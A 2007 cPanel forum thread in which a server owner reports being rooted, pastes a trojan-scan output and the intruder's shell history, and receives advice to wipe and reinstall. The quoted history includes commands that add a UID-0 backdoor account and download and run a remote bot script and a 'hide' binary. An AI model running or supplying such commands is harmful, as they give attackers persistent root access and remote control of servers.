The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked?

Discussion in 'General Discussion' started by w00ts!te, Nov 29, 2007.

  1. w00ts!te

    w00ts!te Registered

    Joined:
    Nov 23, 2007
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    I got rooted.

    I have recieved this email:

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the account lib has user id 0 (root privs).
    This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

    Syslogd and named is failing every 5 minutes and certain things like disk space usage and connections aren't working in a program I use. What's the best thing to do?

    Few WHM Items:
    Scan for Trojan Horses
    Appears Clean



    /dev/core
    /dev/hdx1
    /dev/hdx2
    /dev/saux
    /dev/stderr



    Scanning for Trojan Horses.....

    Possible Trojan - /usr/bin/xmlcatalog
    .

    Possible Trojan - /usr/bin/xmllint
    .
    .
    .
    .
    .
    .
    .

    Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.la
    .

    Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.so
    .

    Possible Trojan - /etc/cron.daily/logrotate

    And this is my history:
    58 last
    59 /sbin/ifconfig |grep inet
    60 /usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib
    61 passwd lib
    62 cat /etc/hosts
    63 cat /etc/passwd
    64 su tf4
    65 su tf4
    66 cd /home/tf4
    67 ls
    68 pwd
    69 mkdir .cor ; cd .cor ; lwp-download http://members.lycos.co.uk/korekt/bot.txt ; perl bot.txt
    70 passwd mysql
    71 wget members.lycos.co.uk/acid4u/hide ; chmod +x hide ; ./hide

    What can I do? I got rooted big time.
     
    #1 w00ts!te, Nov 29, 2007
    Last edited: Nov 29, 2007
  2. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    At this point, you definitely want to remove this account. Since the server was rooted, you can attempt to look through access logs to find out exactly how the attacker got this access, but it's hard to say what all was done and it's best to wipe the server and start with a clean OS install to ensure a clean system.
     
Loading...
Similar Threads - Hacked
  1. xtronica
    Replies:
    9
    Views:
    659

Share This Page